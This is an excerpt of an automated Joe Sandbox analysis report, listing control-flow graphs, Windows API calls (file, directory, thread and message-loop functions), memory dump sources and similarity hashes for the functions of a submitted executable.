                                                                                                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                      • String ID: @UJu$EDIT
                                                                                                                                                      • API String ID: 4243998846-1013725496
                                                                                                                                                      • Opcode ID: 559ad5fbbaa02ddb34fca1daf76ec13ba9d3d2d40016844e835b9d97f291283d
                                                                                                                                                      • Instruction ID: ad3a5cbc84e5e2436ba1128a4f52d4bfb0adfb140e062e96351026b3ce70a5f5
                                                                                                                                                      • Opcode Fuzzy Hash: 559ad5fbbaa02ddb34fca1daf76ec13ba9d3d2d40016844e835b9d97f291283d
                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0C231A01218ABDB20EB74DD05F9FB7AC9F85B40F010065BA00FB181DAB4AA4686A5

Control-flow Graph
(Rendered graph for the function at a2e180 is not reproduced here; legend: Executed / Not Executed.)
APIs
• CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,5C02E116,?,?,00000000,?,?,00000000,00A59E6B,000000FF), ref: 00A2E248
• GetLastError.KERNEL32(?,?,00000000,00A59E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00A2E25A
• CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00A59E6B,000000FF,?,00000011), ref: 00A2E2A6
• GetLastError.KERNEL32(?,?,00000000,00A59E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00A2E2AF
• SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00A59E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 00A2E346
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0
• Opcode ID: 07de37f65f96a7f23def3bfa04d8d04ab4b2065969dacb4d8734f21ba3f1bd47
• Instruction ID: 63382d2976215a79eb92c3dea1b9b06b934836cede985dbcdaa0c5ac62741efd
• Opcode Fuzzy Hash: 07de37f65f96a7f23def3bfa04d8d04ab4b2065969dacb4d8734f21ba3f1bd47
• Instruction Fuzzy Hash: 48618D71904359EFDF24CFA8E985BEE7BB4FB04324F204629F81597280D774A984CB94

Control-flow Graph
(Rendered graph for the function at a374ec is not reproduced here; legend: Executed / Not Executed.)
APIs
  • Part of subcall function 00A377CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,00A273B8), ref: 00A377E1
  • Part of subcall function 00A377CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,00A273B8), ref: 00A377F5
• ReleaseSemaphore.KERNEL32(?,00000040,00000000,5C02E116,?,?,00000001,00000000,00A5A603,000000FF,?,00A390B9,?,?,00A25630,?), ref: 00A3752A
• CloseHandle.KERNELBASE(?,?,?,00A390B9,?,?,00A25630,?,?,?,00000000,?,?,?,00000001,?), ref: 00A37544
• DeleteCriticalSection.KERNEL32(?,?,00A390B9,?,?,00A25630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00A3755D
• CloseHandle.KERNEL32(?,?,00A390B9,?,?,00A25630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00A37569
• CloseHandle.KERNEL32(?,?,00A390B9,?,?,00A25630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00A37575
  • Part of subcall function 00A375ED: WaitForSingleObject.KERNEL32(?,000000FF,00A3770A,?,?,00A3777F,?,?,?,?,?,00A37769), ref: 00A375F3
  • Part of subcall function 00A375ED: GetLastError.KERNEL32(?,?,00A3777F,?,?,?,?,?,00A37769), ref: 00A375FF
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 1868215902-0
• Opcode ID: cb0b313f2968d981f077f16a46bdfb4f76cf860e7075b72d751fa5efc234bd2d
• Instruction ID: 763dcf786d376dad27883141a115ec966e4285d8b2eacc8861b6476a05b8b170
• Opcode Fuzzy Hash: cb0b313f2968d981f077f16a46bdfb4f76cf860e7075b72d751fa5efc234bd2d
• Instruction Fuzzy Hash: F9118472504704EFD722DFA4DD84FCAFBA9FB08761F404929F157921A0CB71A942CB50

Control-flow Graph
(Rendered graph for the function at a40678 is not reproduced here; legend: Executed / Not Executed.)
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A40689
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4069A
• IsDialogMessageW.USER32(00010452,?), ref: 00A406AE
• TranslateMessage.USER32(?), ref: 00A406BC
• DispatchMessageW.USER32(?), ref: 00A406C6
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0
• Opcode ID: 0b4d84b400960899b55891ee83de9e128e11ba9a4d7b3d8eb233f3137e79322c
• Instruction ID: b04689e85daa997ab1ff5a3ba853e2c3785b11140612018784f17b3362ed6aee
• Opcode Fuzzy Hash: 0b4d84b400960899b55891ee83de9e128e11ba9a4d7b3d8eb233f3137e79322c
• Instruction Fuzzy Hash: DEF0BDB190622AAB9B20EBE2EC4CDDF7FACEE452517418415B50AD2050E6B4D547CAB0

Control-flow Graph
(Rendered graph for the function at a42813 is not reproduced here; legend: Executed / Not Executed.)
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: _wcslen
• String ID: HIDE$MAX$MIN
• API String ID: 176396367-2426493550
• Opcode ID: 448adac1aadc5c995a45d7f7c043aad51b35ef293646a444128db3054edbd3cd
• Instruction ID: ade3f86bb543d82876d381a7e2a896d033f8209fdfde02e3278251827dff8c0e
• Opcode Fuzzy Hash: 448adac1aadc5c995a45d7f7c043aad51b35ef293646a444128db3054edbd3cd
• Instruction Fuzzy Hash: 88B19176C00268DECF25DFA8CD85BDDBBB8BF99310F5405AAE804B7141DB709A89CB51

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A36C5E: __EH_prolog3_GS.LIBCMT ref: 00A36C65
                                                                                                                                                        • Part of subcall function 00A36C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00A36C9A
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00A3F4ED
                                                                                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A3F524
                                                                                                                                                      • SHGetMalloc.SHELL32(00A7532C), ref: 00A3F52E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                                                                                                                                      • String ID: riched20.dll
                                                                                                                                                      • API String ID: 2446841611-3360196438
                                                                                                                                                      • Opcode ID: 03bf7b054d61143d2795236eae266992abf1f35db16ad249fd7b3c970d94dc6d
                                                                                                                                                      • Instruction ID: 8939f7b8fe57d061b416e81032e9b8b005e602c4292582774a95284401e758d4
                                                                                                                                                      • Opcode Fuzzy Hash: 03bf7b054d61143d2795236eae266992abf1f35db16ad249fd7b3c970d94dc6d
                                                                                                                                                      • Instruction Fuzzy Hash: E0F0FFB5D00209ABCB10AFA9DC499DFFBFCEF94741F008056F515E2251D7B456468BA1

                                                                                                                                                      Control-flow Graph (basic blocks and edges)

                                                                                                                                                      control_flow_graph 1241 a2e948-a2e961 call a457d8 1244 a2e963-a2e965 1241->1244 1245 a2e96a-a2e974 1241->1245 1246 a2eaa6-a2eaab call a45787 1244->1246 1247 a2e976-a2e983 GetStdHandle 1245->1247 1248 a2e988 1245->1248 1249 a2ea6f-a2ea72 1247->1249 1250 a2e98b-a2e998 1248->1250 1249->1250 1253 a2e99a-a2e99e 1250->1253 1254 a2e9df-a2e9f4 WriteFile 1250->1254 1256 a2e9a0-a2e9ab 1253->1256 1257 a2e9ff-a2ea03 1253->1257 1255 a2e9f7-a2e9f9 1254->1255 1255->1257 1260 a2ea9f-a2eaa2 1255->1260 1258 a2e9af-a2e9ce WriteFile 1256->1258 1259 a2e9ad 1256->1259 1257->1260 1261 a2ea09-a2ea0d 1257->1261 1258->1255 1262 a2e9d0-a2e9db 1258->1262 1259->1258 1260->1246 1261->1260 1263 a2ea13-a2ea25 call a29230 1261->1263 1264 a2e9dd 1262->1264 1267 a2ea77-a2ea9a call a214a7 call a29653 call a21a66 1263->1267 1268 a2ea27-a2ea30 1263->1268 1264->1255 1267->1260 1268->1250 1270 a2ea36-a2ea3a 1268->1270 1270->1250 1272 a2ea40-a2ea6c 1270->1272 1272->1249
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2E94F
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,0000002C,00A32D28,?,?,?,?,00000000,00A3ABB6,?,?,?,?,?,00A3A80E,?), ref: 00A2E978
                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A2E9BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileH_prolog3_HandleWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2898186245-0
                                                                                                                                                      • Opcode ID: 31055693b0350cf92623853363a436f6c3a56fa1a0e743b4c739294ee67fdac1
                                                                                                                                                      • Instruction ID: 5eada716b6c9abd17f3fb19fe2850d2eba6a8bc19f46f10c6238b8eff4dff652
                                                                                                                                                      • Opcode Fuzzy Hash: 31055693b0350cf92623853363a436f6c3a56fa1a0e743b4c739294ee67fdac1
                                                                                                                                                      • Instruction Fuzzy Hash: 8B418C35A01364EFDF14DFA8E894BADBB76BF84711F044129E801AB291CB759D84CBA1

                                                                                                                                                      Control-flow Graph (basic blocks and edges)

                                                                                                                                                      control_flow_graph 1280 a2efef-a2f00a call a457d8 call a313da 1285 a2f031-a2f033 1280->1285 1286 a2f00c-a2f00f 1280->1286 1287 a2f035-a2f03d call a2ed0d 1285->1287 1286->1285 1288 a2f011-a2f017 1286->1288 1297 a2f0e3-a2f0f0 GetLastError 1287->1297 1298 a2f043-a2f065 call a3169a 1287->1298 1289 a2f01b-a2f029 CreateDirectoryW 1288->1289 1290 a2f019 1288->1290 1292 a2f0d0-a2f0d4 1289->1292 1293 a2f02f 1289->1293 1290->1289 1295 a2f0d6-a2f0da call a2f58b 1292->1295 1296 a2f0df-a2f0e1 1292->1296 1293->1287 1295->1296 1301 a2f0fb-a2f100 call a45787 1296->1301 1297->1301 1302 a2f0f2-a2f0fa 1297->1302 1305 a2f067-a2f06e 1298->1305 1306 a2f07d-a2f087 1298->1306 1302->1301 1308 a2f073-a2f07b CreateDirectoryW 1305->1308 1309 a2f070 1305->1309 1310 a2f089-a2f09e 1306->1310 1311 a2f0bc-a2f0ce 1306->1311 1308->1306 1309->1308 1312 a2f0b3-a2f0bb call a45726 1310->1312 1313 a2f0a0-a2f0b0 call a219a9 1310->1313 1311->1292 1311->1297 1312->1311 1313->1312
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2EFF6
                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,00A2EBA7,?,00000001,00000000,?,?,00000024,00A2A4DE,?,00000001,?,?), ref: 00A2F01F
                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,00A2EBA7,?,00000001,00000000,?,?,00000024,00A2A4DE,?), ref: 00A2F075
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000024,00A2EBA7,?,00000001,00000000,?,?,00000024,00A2A4DE,?,00000001,?,?,00000000), ref: 00A2F0E3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3709856315-0
                                                                                                                                                      • Opcode ID: e126d1299e865d20e9d5bdc943fa5a17a94aa2779e78f79fba53a971174b3b1f
                                                                                                                                                      • Instruction ID: bb4a5119ad6860332d822bb7b880b3dc46caa1c9adb6b51024cf77a561e49e69
                                                                                                                                                      • Opcode Fuzzy Hash: e126d1299e865d20e9d5bdc943fa5a17a94aa2779e78f79fba53a971174b3b1f
                                                                                                                                                      • Instruction Fuzzy Hash: 5C318171904229DFDF10DFEDE9889EEBBB8AF48310F14443AE501E7252E7349985CB61

                                                                                                                                                      Control-flow Graph (basic blocks and edges)

                                                                                                                                                      control_flow_graph 1318 a2e019-a2e025 1319 a2e032-a2e049 ReadFile 1318->1319 1320 a2e027-a2e02f GetStdHandle 1318->1320 1321 a2e0a5 1319->1321 1322 a2e04b-a2e054 call a2e152 1319->1322 1320->1319 1323 a2e0a8-a2e0ab 1321->1323 1326 a2e056-a2e05e 1322->1326 1327 a2e06d-a2e071 1322->1327 1326->1327 1328 a2e060 1326->1328 1329 a2e082-a2e086 1327->1329 1330 a2e073-a2e07c GetLastError 1327->1330 1331 a2e061-a2e06b call a2e019 1328->1331 1333 a2e0a0-a2e0a3 1329->1333 1334 a2e088-a2e090 1329->1334 1330->1329 1332 a2e07e-a2e080 1330->1332 1331->1323 1332->1323 1333->1323 1334->1333 1336 a2e092-a2e09b GetLastError 1334->1336 1336->1333 1338 a2e09d-a2e09e 1336->1338 1338->1331
                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E029
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E041
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E073
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E092
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2244327787-0
                                                                                                                                                      • Opcode ID: a5c3843b9790ae053e1e3ff47ee1fe988e795b306aa8efadf61be398de9ad521
                                                                                                                                                      • Instruction ID: 71435dbf0392b6649362909b78853f01f309b181f5fbd36a0d00970c68b3c53f
                                                                                                                                                      • Opcode Fuzzy Hash: a5c3843b9790ae053e1e3ff47ee1fe988e795b306aa8efadf61be398de9ad521
                                                                                                                                                      • Instruction Fuzzy Hash: 8411C230588328EFDB34DF68E904A6E37B9FB45321F104639E51685290C7F19ED6DB61
                                                                                                                                                      APIs
                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 00A3764C
                                                                                                                                                      • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,00A2736D,00A25AB0,?), ref: 00A37693
                                                                                                                                                        • Part of subcall function 00A292EB: __EH_prolog3_GS.LIBCMT ref: 00A292F2
                                                                                                                                                        • Part of subcall function 00A29500: __EH_prolog3_GS.LIBCMT ref: 00A29507
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_Thread$CreatePriority
                                                                                                                                                      • String ID: CreateThread failed
                                                                                                                                                      • API String ID: 3138599208-3849766595
                                                                                                                                                      • Opcode ID: 2c05431194fab7e06c4cc64cc69283505aa45cb3811ff3cb008a6e7231696d91
                                                                                                                                                      • Instruction ID: ffe4b306a0d0f2fc83020cea64d0d1425acfdd8ff63c525dfc13b0fba8af3c76
                                                                                                                                                      • Opcode Fuzzy Hash: 2c05431194fab7e06c4cc64cc69283505aa45cb3811ff3cb008a6e7231696d91
                                                                                                                                                      • Instruction Fuzzy Hash: 3001A2B5388705BFE220AFA8AC82FA673A8FB45B11F20042DF58596181CAF178458768
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2DEA1
                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,00A2E8F5,?,?,00A2A6B9,?,00000011,?), ref: 00A2DF15
                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,00A2D303,?,?,?), ref: 00A2DF65
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1771569470-0
                                                                                                                                                      • Opcode ID: 11167511b1b34b6edaff956ffcdd4523536bb28ae4374b04fdaf23f50e6067d2
                                                                                                                                                      • Instruction ID: 92befa25b93a2d200e7ec5160c3afffffd9cc74b52d84738cdbd26fe376001f9
                                                                                                                                                      • Opcode Fuzzy Hash: 11167511b1b34b6edaff956ffcdd4523536bb28ae4374b04fdaf23f50e6067d2
                                                                                                                                                      • Instruction Fuzzy Hash: CF416F71C103189FDB14DFA8D98ABEEB7F4FB48321F10562EF452A6282D774A9448B24
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A36C65
                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00A36C9A
                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00A36D0C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1552931673-0
                                                                                                                                                      • Opcode ID: a1a881b041c7cbb89fe211f69be50fd9cc55932f9e5081aa434982b3533f2535
                                                                                                                                                      • Instruction ID: 3a0f42973b43c943d1afd01e7eab0fde7292c80ff3b416e9c1ad9c83614a5619
                                                                                                                                                      • Opcode Fuzzy Hash: a1a881b041c7cbb89fe211f69be50fd9cc55932f9e5081aa434982b3533f2535
                                                                                                                                                      • Instruction Fuzzy Hash: D0319C75D00358EFCB04EBE8D999BEEBBB8AF48315F104129E105B7282DB345A45CB61
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2F592
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(?,?,00000024,00A2A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00A2F5A8
                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2F5EB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2559025557-0
                                                                                                                                                      • Opcode ID: df7ad05ef764464447ba462dfb1cc0b095d80685ef5e4f06c71c6f3ffe5b4b17
                                                                                                                                                      • Instruction ID: af146eee4c1c167e018a1b54b72045b61bcf994c196031cc33bd8c3bc54ac6f7
                                                                                                                                                      • Opcode Fuzzy Hash: df7ad05ef764464447ba462dfb1cc0b095d80685ef5e4f06c71c6f3ffe5b4b17
                                                                                                                                                      • Instruction Fuzzy Hash: 49110074910218EFDF04DFA8E985ADEBBB8BF48311F14443AF800E7250DB349A85CB64
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2EC6A
                                                                                                                                                      • DeleteFileW.KERNELBASE(?,00000024,00A2D6F7,?), ref: 00A2EC7D
                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 00A2ECBD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
